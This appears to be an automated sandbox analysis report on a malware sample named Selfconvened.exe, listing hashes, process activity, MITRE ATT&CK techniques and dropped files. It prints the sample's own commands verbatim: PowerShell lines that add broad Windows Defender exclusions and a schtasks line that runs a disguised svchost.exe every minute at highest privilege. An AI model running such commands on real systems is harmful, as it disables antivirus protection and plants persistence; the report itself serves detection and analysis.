b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916

General

Target

$TEMP/Selfconvened.exe
Size

4.5MB
MD5

64b5e984fda860eedf19c29a124094fb
SHA1

760c195741989e17b48ad52c13bed35e8ea51692
SHA256

1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
SHA512

187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4
SSDEEP

98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1676	powershell.exe
1944	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1612	svchost.exe

Loads dropped DLL 1 IoCs

pid	Process
2404	taskeng.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\WindowsPro\svchost.exe	Selfconvened.exe
File opened for modification	C:\Windows\system32\WindowsPro\svchost.exe	Selfconvened.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1076	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2668	Selfconvened.exe
1676	powershell.exe
1944	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2668	Selfconvened.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	1612	svchost.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2668 wrote to memory of 1420	2668	Selfconvened.exe	31
PID 2668 wrote to memory of 1420	2668	Selfconvened.exe	31
PID 2668 wrote to memory of 1420	2668	Selfconvened.exe	31
PID 2668 wrote to memory of 1076	2668	Selfconvened.exe	33
PID 2668 wrote to memory of 1076	2668	Selfconvened.exe	33
PID 2668 wrote to memory of 1076	2668	Selfconvened.exe	33
PID 1420 wrote to memory of 1676	1420	cmd.exe	34
PID 1420 wrote to memory of 1676	1420	cmd.exe	34
PID 1420 wrote to memory of 1676	1420	cmd.exe	34
PID 1420 wrote to memory of 1944	1420	cmd.exe	36
PID 1420 wrote to memory of 1944	1420	cmd.exe	36
PID 1420 wrote to memory of 1944	1420	cmd.exe	36
PID 2404 wrote to memory of 1612	2404	taskeng.exe	38
PID 2404 wrote to memory of 1612	2404	taskeng.exe	38
PID 2404 wrote to memory of 1612	2404	taskeng.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe
"C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\system32\cmd.exe
  "cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- C:\Windows\system32\schtasks.exe
  "schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1076

C:\Windows\system32\taskeng.exe
taskeng.exe {F40DC70A-C459-4C22-96C7-26AD4C4C5ECE} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\system32\WindowsPro\svchost.exe
  C:\Windows\system32\WindowsPro\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
afa5575d0c4498c7287f85a02060e816

SHA1
8ae2d797a8a7e9c92e6ef6a396005bd75a8ac59e

SHA256
f8834503073d7f3832c05202ca10dd2c3d1ac6f0433dfd654889cda4e9f630d0

SHA512
368ec22bf90bfbe484863bab50fbe9fb149764a863f6441d08b33208b05fe24fd14adb582d0495365f5628f7b755c97cc1be23c2617df17925584695dfe2662b

Download Submit
C:\Windows\System32\WindowsPro\svchost.exe

Filesize
10.3MB

MD5
8b4918be89e6a43989b82f6c57d04e40

SHA1
5ad9ed6edb148296f5fdc066de50c832e4254591

SHA256
1c13380def89afa50f7503522b936d24fcdb9078141cc4411980b050899ffec2

SHA512
b33b1297d8f5c80c843d9df9a44397c8469a8851bebcd809445135deb7de5d3d0a62fc407ca7903499860d5198e9e63d62fdb1542ed762eccf19183ea95daf76

Download Submit
memory/1612-35-0x00000000009B0000-0x0000000000E2A000-memory.dmp

Filesize
4.5MB

Download
memory/1676-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/1676-21-0x000000001B8F0000-0x000000001BBD2000-memory.dmp

Filesize
2.9MB

Download
memory/1944-29-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/1944-28-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2668-5-0x000007FEF63D3000-0x000007FEF63D4000-memory.dmp

Filesize
4KB

Download
memory/2668-8-0x00000000217C0000-0x0000000021A64000-memory.dmp

Filesize
2.6MB

Download
memory/2668-9-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-10-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-11-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-7-0x0000000021410000-0x00000000217B8000-memory.dmp

Filesize
3.7MB

Download
memory/2668-6-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-0-0x000007FEF63D3000-0x000007FEF63D4000-memory.dmp

Filesize
4KB

Download
memory/2668-4-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-3-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-2-0x000000001C860000-0x000000001CC18000-memory.dmp

Filesize
3.7MB

Download
memory/2668-30-0x000007FEF63D0000-0x000007FEF6DBC000-memory.dmp

Filesize
9.9MB

Download
memory/2668-1-0x0000000000E30000-0x00000000012AA000-memory.dmp

Filesize
4.5MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads